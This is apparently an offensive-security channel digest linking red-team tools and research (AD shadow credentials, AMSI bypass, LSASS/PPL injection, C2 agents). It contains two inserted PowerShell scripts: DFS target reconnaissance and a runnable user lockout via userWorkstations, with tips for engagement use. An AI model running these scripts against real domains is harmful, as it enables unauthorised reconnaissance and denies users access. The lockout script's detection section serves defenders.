😈 [ Ellis Springe @knavesec ]
Dropping a one-off script to pull arbitrary AD attributes from ADExplorer snapshots. @0xBoku and I used this on a recent op to pull custom attributes that listed Computer objects owned by specific users so we could correlate high-value targets to systems:
🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/66
🐥 [ tweet ]
🔥3
😈 [ RedTeam Pentesting @RedTeamPT ]
🎉 We've just released 🔐 keycred 🎉
A cross-platform tool for handling Active Directory Shadow Credentials/msDS-KeyCredentialLink 🔑.
It supports UnPAC-the-Hash/PKINIT, Pass-the-Cert, Channel Binding and more 💪🚀
🔥 Get it while it's still hot! 🔥
🔗 https://github.com/RedTeamPentesting/keycred
🐥 [ tweet ]
👍8🥱6
😈 [ Synacktiv @Synacktiv ]
In our latest article, @l4x4 revisits the secretsdump implementation, offering an alternative that avoids reg save and eliminates writing files to disk, significantly reducing the likelihood of triggering security alerts. Read the details at the link below.
🔗 https://www.synacktiv.com/publications/lsa-secrets-revisiting-secretsdump
🐥 [ tweet ]
🥱4🔥3
😈 [ TrustedSec @TrustedSec ]
In our new #blog, Senior Research Analyst @codewhisperer84 unveils his new tool DIT Explorer which he created after researching NTDS.dit files on Active Directory. Read part one of this series now to find out what this tool can do!
🔗 https://trustedsec.com/blog/exploring-ntds-dit-part-1-cracking-the-surface-with-dit-explorer
🐥 [ tweet ]
👍3🥱3
😈 [ Orange Cyberdefense Switzerland @orangecyberch ]
💻🛡️ In this blog post, Clément Labro explains how he developed a tool that lets you run PowerShell without the various system protections.
👉 Discover this article on our blog:
🔗 https://blog.scrt.ch/2025/02/18/reinventing-powershell-in-c-c
🐥 [ tweet ]
👍5🥱3🔥2
DFS Targets & Links
So you no longer have to do it like this:
🔗 https://ppn.snovvcra.sh/pentest/infrastructure/ad/post-exploitation#locate-dfs-targets
Now you can do it like this:
🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/67
🔥7
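As an added example (not code from the linked PR or from the channel's notes), here is the same DFS target lookup done live against AD with the RSAT ActiveDirectory module. The PR does this offline from an ADExplorer snapshot; this shows which objects and attributes under CN=Dfs-Configuration it has to read. It assumes domain membership and read access to that container; the UTF-16LE encoding of the v2 target XML is an assumption, with a UTF-8 fallback.

```powershell
# Added example, not from the PR or the ppn notes: enumerate DFS targets from AD.
# Assumes the RSAT ActiveDirectory module and read access to CN=Dfs-Configuration.
Import-Module ActiveDirectory

function Get-DfsTargetsFromAd {
    $nc   = (Get-ADRootDSE).defaultNamingContext
    $base = "CN=Dfs-Configuration,CN=System,$nc"

    # DFS v1 (Windows 2000 Server mode): one fTDfs object per namespace. The
    # root targets are \\server\share strings in remoteServerName; link targets
    # live in the binary pKT blob, which is not parsed here.
    Get-ADObject -SearchBase $base -LDAPFilter '(objectClass=fTDfs)' -Properties remoteServerName |
        ForEach-Object {
            $ns = $_.Name
            foreach ($t in @($_.remoteServerName)) {
                [pscustomobject]@{ Version = 'v1'; Namespace = $ns; Link = '(root)'; Target = $t }
            }
        }

    # DFS v2 (Windows Server 2008 mode): msDFS-Namespacev2 for the root and one
    # msDFS-Linkv2 child per link. msDFS-TargetListv2 is an octet string holding
    # an XML <targets> document that lists the \\server\share targets.
    Get-ADObject -SearchBase $base `
        -LDAPFilter '(|(objectClass=msDFS-Namespacev2)(objectClass=msDFS-Linkv2))' `
        -Properties 'msDFS-LinkPathv2','msDFS-TargetListv2' |
        ForEach-Object {
            $raw = $_.'msDFS-TargetListv2'
            if (-not $raw) { return }   # object has no targets; skip it
            # Assumption: the XML is UTF-16LE. Fall back to UTF-8 if that decoding looks wrong.
            $xml = [System.Text.Encoding]::Unicode.GetString([byte[]]$raw)
            if ($xml -notmatch '<targets') { $xml = [System.Text.Encoding]::UTF8.GetString([byte[]]$raw) }
            if ($_.ObjectClass -eq 'msDFS-Linkv2') {
                # Parent RDN of the link is the namespace object.
                $ns   = (($_.DistinguishedName -split ',(?=CN=)')[1]) -replace '^CN=', ''
                $link = $_.'msDFS-LinkPathv2'
            } else {
                $ns   = $_.Name
                $link = '(root)'
            }
            # Pull every UNC path out of the XML without depending on its exact schema.
            foreach ($m in [regex]::Matches($xml, '\\\\[^<"]+')) {
                [pscustomobject]@{ Version = 'v2'; Namespace = $ns; Link = $link; Target = $m.Value }
            }
        }
}

# The unique target shares are the input for the next step (share enumeration,
# hunting writable DFS folders, or picking a poisoning location).
Get-DfsTargetsFromAd | Sort-Object Target -Unique | Format-Table -AutoSize
```

Running this is an authenticated LDAP read of CN=System, so it needs no special rights beyond a domain account, which is exactly why the same data is recoverable from an ADExplorer snapshot taken with that account.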
😈 [ Octoberfest7 @Octoberfest73 ]
Really cool repo I came across that reverses/reimplements LoadLibrary. Very useful to have a chart / code depicting what all happens and when
🔗 https://github.com/paskalian/WID_LoadLibrary
🐥 [ tweet ]
😈 [ Rtl Dallas @RtlDallas ]
New update for Draugr! 🙂
Now supports indirect syscalls with a synthetic stack frame. I’ve removed Draugr-Strike and replaced it with Cobalt Strike's process injection kit (Thread Spoof or Early Bird) using indirect syscalls and a synthetic stack frame.
🔗 https://github.com/NtDallas/Draugr
🐥 [ tweet ]
😁2
😈 [ 0SKR @saab_sec ]
❗ Blog Alert ❗
🔴 Introducing a thread hijacking ttp variant called Phantom call.
🔴 Discussion on effect of stack alignment on SIMD instructions/registers.
🔴 In depth analysis of Win32 API RtlRemoteCall
🔴 Weaponizing RtlRemoteCall
🔗 https://sabotagesec.com/thread-hijacking-iceberg-deep-dive-into-phantom-call-rtlremotecall/
🐥 [ tweet ]
🔥7👍4🤯4
Peace, Labour, May, and PHDays 2025 (May 22–24)
The upcoming PHDays will be a special one: on top of all the usual goodies (talks, the bar, and networking with colleagues) you get a serving of hardcore-style material in the Offense track, where we (a.k.a. 🟥 SWARM) will be talking about the hard topics of offensive security. Responsibly disclosed 0-days, non-public TTPs of advanced attackers, APT-grade tooling, real cases from engagements that are impossible to keep quiet about, and much more.
Otherwise, the classics:
🤖 Forum and festival in the cyber city
🗡 Cyber battle (a.k.a. Standoff 15)
🔭 Popular science and art
👨🎓 Hands-on sessions and workshops
And of course the most important part: the battle cry for the CFP is right 🔜 here 🔙
🔥41👍12🍌11🥱9😢2
😈 [ S3cur3Th1sSh1t @ShitSecure ]
Bypass AMSI in 2025, my newest blog post is published 🥳! A review on what changed over the last years and what's still efficient today.
🔗 https://en.r-tec.net/r-tec-blog-bypass-amsi-in-2025.html
🐥 [ tweet ]
🔥19
😈 [ Synacktiv @Synacktiv ]
In our latest article, @croco_byte and @SScaum demonstrate a trick that makes Windows SMB clients fall back to WebDAV HTTP authentication, enhancing the NTLM and Kerberos relaying capabilities of multicast poisoning attacks!
🔗 https://www.synacktiv.com/publications/taking-the-relaying-capabilities-of-multicast-poisoning-to-the-next-level-tricking
🐥 [ tweet ]
👍7🥱3
😈 [ T3nb3w @T3nb3w ]
🚀 New Blog & PoC: Abusing IDispatch for COM Object Access & PPL Injection
Leveraging STDFONT via IDispatch to inject into PPL processes & access LSASS. Inspired by James Forshaw's research!
Blog:
🔗 https://mohamed-fakroud.gitbook.io/red-teamings-dojo/abusing-idispatch-for-trapped-com-object-access-and-injecting-into-ppl-processes
Code:
🔗 https://github.com/T3nb3w/ComDotNetExploit
Original:
🔗 https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html
🐥 [ tweet ]
🤯5🥱3
😈 [ Mayfly @M4yFly ]
New Active Directory Mindmap v2025.03! 🚀
📖 Readable version:
🔗 https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
🔧 Now fully generated from markdown files — way easier to update and maintain!
💡 Got improvements? PRs welcome! 👇
🔗 https://github.com/Orange-Cyberdefense/ocd-mindmaps/tree/main/excalimap/mindmap/ad
🐥 [ tweet ]
🔥23👍9🥱2
😈 [ TrustedSec @TrustedSec ]
A Red Team engagement is a serious commitment for any org who wants to improve their security posture. In our new blog, @curi0usJack breaks down some goals of a Red Team engagement so that you can better measure its success. Read it now!
🔗 https://trustedsec.com/blog/measuring-the-success-of-your-adversary-simulations
🐥 [ tweet ]
🔥6🥱6🤔1
😈 [ 📔 Michael Grafnetter @MGrafnetter ]
New Indicator of Compromise (IoC) for the NTLM Relay Attack with Shadow Credentials, thanks to bugs in Impacket, a popular Python implementation. Will probably be fixed in the near future.
🔗 https://www.dsinternals.com/en/indicator-of-compromise-shadow-credentials-ntlm-relay-impacket/
🐥 [ tweet ]
👍5
😈 [ MrAle98 @MrAle_98 ]
Hey there,
Finally published the article on the CVE-2025-21333 PoC exploit.
Here the link to the article:
🔗 https://medium.com/@ale18109800/cve-2025-21333-windows-heap-based-buffer-overflow-analysis-d1b597ae4bae
🐥 [ tweet ]
🔥8
😈 [ Oddvar Moe @Oddvarmoe ]
TIL, the attribute userWorkstations is still in play in modern windows 🤯
If you set the attribute on a user to something random, the user cannot log in to the computers anymore. Need privs to adjust, but I can see potential when you want to lock someone out for a while
🐥 [ tweet ]
👍15😁4🤔4
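The lock-out described in the tweet, as an added example written here (not code from the tweet's author): set userWorkstations to a host that does not exist, confirm the value, restore it exactly, and show the defender's view of the write. It assumes the RSAT ActiveDirectory module and WriteProperty rights on the attribute; the user name 'jdoe' and the host name 'DECOY-PC' are placeholders.

```powershell
# Added example, not from the original tweet: abuse userWorkstations to lock a
# user out of every workstation, then revert. Assumes the RSAT ActiveDirectory
# module and WriteProperty on the attribute. 'jdoe' and 'DECOY-PC' are placeholders.
Import-Module ActiveDirectory

function Set-UserWorkstationLockout {
    param(
        [Parameter(Mandatory)] [string] $Identity,
        [string] $DecoyHost = 'DECOY-PC'
    )
    # Keep the old value so the change can be reverted exactly.
    $before = (Get-ADUser -Identity $Identity -Properties userWorkstations).userWorkstations
    # -LogonWorkstations is the cmdlet's name for userWorkstations: a
    # comma-separated list of NetBIOS names the user is allowed to log on to.
    Set-ADUser -Identity $Identity -LogonWorkstations $DecoyHost
    return $before
}

function Restore-UserWorkstation {
    param(
        [Parameter(Mandatory)] [string] $Identity,
        [AllowNull()] [string] $Previous
    )
    if ([string]::IsNullOrEmpty($Previous)) {
        # The attribute was unset before; an absent value means "all workstations".
        Set-ADUser -Identity $Identity -Clear userWorkstations
    } else {
        Set-ADUser -Identity $Identity -LogonWorkstations $Previous
    }
}

# Usage: lock out, verify, restore.
$saved = Set-UserWorkstationLockout -Identity 'jdoe'
(Get-ADUser -Identity 'jdoe' -Properties userWorkstations).userWorkstations   # DECOY-PC
# Until restored, the DC rejects the user's logons with STATUS_INVALID_WORKSTATION
# (sub status 0xC0000070 in Security event 4625 on the machine they tried).
Restore-UserWorkstation -Identity 'jdoe' -Previous $saved

# Defender check: with "Audit Directory Service Changes" enabled, the DC logs
# event 5136 naming the modified attribute. This pulls recent writes to userWorkstations.
Get-WinEvent -ComputerName (Get-ADDomainController).HostName `
    -FilterHashtable @{ LogName = 'Security'; Id = 5136 } -MaxEvents 1000 |
    Where-Object { $_.Message -match 'LDAP Display Name:\s+userWorkstations' } |
    Select-Object TimeCreated, @{ n = 'Detail'; e = { $_.Message -replace '\s+', ' ' } }
```

Two caveats a practitioner will want: the restriction is evaluated by the DC at authentication time, so sessions that already exist are not torn down, and NTLM logons from a disallowed host fail with 0xC0000070 while Kerberos pre-authentication fails with KDC_ERR_POLICY, so both the 4625 sub status and the 4768 failure code are worth watching if you use this on an engagement.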
😈 [ c0rnbread @0xC0rnbread ]
Today I'm releasing Xenon, a custom Mythic agent for Windows targets written in C.
Notable features include:
📁 Modular command/code inclusion
🦠 Malleable C2 Profile support
🪨 Compatible with Cobalt Strike BOFs
🔗 https://github.com/MythicAgents/Xenon
Blog series:
🔗 https://c0rnbread.com/creating-mythic-c2-agent-part1/
🐥 [ tweet ]
👍6